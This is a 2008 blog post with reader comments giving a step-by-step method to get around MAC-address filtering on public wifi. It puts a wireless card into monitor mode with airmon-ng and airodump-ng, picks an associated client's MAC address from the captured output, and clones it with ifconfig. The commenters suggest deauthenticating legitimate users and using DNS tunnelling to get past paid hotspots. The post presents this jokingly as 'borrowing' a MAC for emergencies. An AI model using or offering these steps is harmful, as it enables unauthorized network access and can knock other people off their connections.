Tuesday, February 5, 2008

MAC address stealing for public wifi use

Keeping with my theme of "you never know when you need to crack WEP" or be able to get internet access...

If you find yourself in a life or death situation and its imperative that you get your lappy up on the net to send that "help me!" email and they are using MAC authentication, meaning only registered MACs can access the net, you can do the following:

pull out your trusty Ubiquiti or orinoco card or whatever you use and put it in monitor mode.

root@ineedhelp! #airmon-ng start wifi0

it will tell you what interface it started, for me and the ubiquiti card it was eth2

root@ineedhelp! #airodump-ng eth2

You should see something like the below:

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:C0:02:3A:C4:32, 2008-02-03 17:46:43, 2008-02-03 17:47:03, 11, 54, OPN , , , 2, 11, 5, 172. 16. 17. 42, 9, INTESA9-A,
00:C0:02:3A:AF:0E, 2008-02-03 17:46:41, 2008-02-03 17:47:07, 11, 54, OPN , , , 1, 11, 12, 172. 16. 16.225, 8, INTESA15,
00:02:2D:AB:1D:4E, 2008-02-03 17:46:40, 2008-02-03 17:47:10, 4, 11, OPN , , , 7, 26, 72, 172. 16. 16. 76, 8, INTESA13,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:12:17:72:5F:18, 2008-02-03 17:46:41, 2008-02-03 17:47:09, -1, 36, 00:02:2D:AB:1D:4E,
00:12:17:98:00:C5, 2008-02-03 17:46:44, 2008-02-03 17:46:58, -1, 3, 00:02:2D:AB:1D:4E,
00:12:17:97:D8:2D, 2008-02-03 17:46:46, 2008-02-03 17:46:46, -1, 1, 00:02:2D:AB:1D:4E,
00:12:17:98:39:6F, 2008-02-03 17:46:50, 2008-02-03 17:46:50, -1, 1, 00:02:2D:AB:1D:4E,
00:06:25:27:55:EB, 2008-02-03 17:46:47, 2008-02-03 17:46:59, 8, 4, 00:C0:02:3A:AF:0E,
00:12:17:A4:65:45, 2008-02-03 17:46:56, 2008-02-03 17:47:06, 12, 4, 00:02:2D:AB:1D:4E, INTESA13
00:12:17:98:2B:6F, 2008-02-03 17:46:48, 2008-02-03 17:46:50, 11, 2, (not associated) , INTESA9-A
00:12:17:98:44:4B, 2008-02-03 17:46:40, 2008-02-03 17:47:02, 9, 8, 00:02:2D:AB:1D:4E,
00:12:17:98:2B:6E, 2008-02-03 17:47:00, 2008-02-03 17:47:01, 0, 2, (not associated) , INTESA10

Go ahead and pick someone associated, thats going to be a valid MAC address for you to steal....er borrow.

00:12:17:98:44:4B, 2008-02-03 17:46:40, 2008-02-03 17:47:02, 9, 8, 00:02:2D:AB:1D:4E,

00:12:17:98:44:4B <-- Client MAC

00:02:2D:AB:1D:4E <-- WAP MAC

from there its a simple:

root@ineedhelp! #ifconfig eth2 down
root@ineedhelp! #ifconfig eth2 hw ether 00:12:17:98:44:4B
root@ineedhelp! #ifconfig eth2 up

now you should be handed a valid IP

root@ineedhelp! #ifconfig eth2
eth2 Link encap:Ethernet HWaddr 00:12:17:98:44:4B
inet addr: Bcast: Mask:
inet6 addr: fe80::a800:4ff:fe00:a04/64 Scope:Link
RX packets:188860 errors:1128 dropped:1128 overruns:0 frame:1128
TX packets:65680 errors:1183 dropped:1 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:44299003 (42.2 MB) TX bytes:11928926 (11.3 MB)
Interrupt:3 Base address:0x5100

now you can send your emergency email, make that emergency blog post, or just search the net for the answer to your emergency...


sandro said...

hope you solved your lion related problem =)

mac address filtering on wifi is really weak "authentication". For windows people can sometimes simply use wireshark (i think that depends on the driver) to sniff those lovely packets and then use macshift to change mac address.

When it comes to wifi hotspots like the ones found in hotels that require you to pay / login dns tunneling works great :)

But that's probably another post right?

srcasm said...

Just a quick heads up. When doing this type of attack, it would not be out of the realm of possibility to start to screw up some ARP tables. Using airsnort, you can kick the current user off of Wifi to make sure that your packets get to where they should go and back.

Good post though.

CG said...

you guys are both right, even while you authenticate and fail because your mac is in valid you can see traffic on the wifi interface so you can see some valid MACs.
and you could, if you want to be a dick, just deauth people and take over, but that's just mean :-P